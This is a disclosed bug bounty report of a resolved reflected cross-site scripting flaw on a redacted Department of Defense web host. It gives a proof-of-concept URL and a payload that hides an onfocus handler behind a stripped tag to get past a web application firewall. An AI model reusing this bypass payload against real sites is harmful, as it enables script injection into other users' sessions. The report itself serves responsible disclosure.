XSS on https://████/ via ███████ parameter

Disclosed: 2022-04-07 19:55:49 By homosec To deptofdefense
Medium
Vulnerability Details
PoC ``` https://████████/██████=█████████%22%20o%3Cbr%3Enfocus=confirm(1337)%20autofocus%20tabindex=1%20xss ``` Payload ``` o<br>nfocus=confirm(1337) autofocus tabindex=1 xss ``` WAF bypass Tags are removed from user input. It is allowed to bypass WAF. ███ ## Impact XSS on https://████████/ ## System Host(s) ███ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce Go to ``` https://█████/██████=████%22%20o%3Cbr%3Enfocus=confirm(1337)%20autofocus%20tabindex=1%20xss ``` ## Suggested Mitigation/Remediation Actions
Actions
View on HackerOne
Report Stats
  • Report ID: 1251868
  • State: Closed
  • Substate: resolved
  • Upvotes: 6
Share this report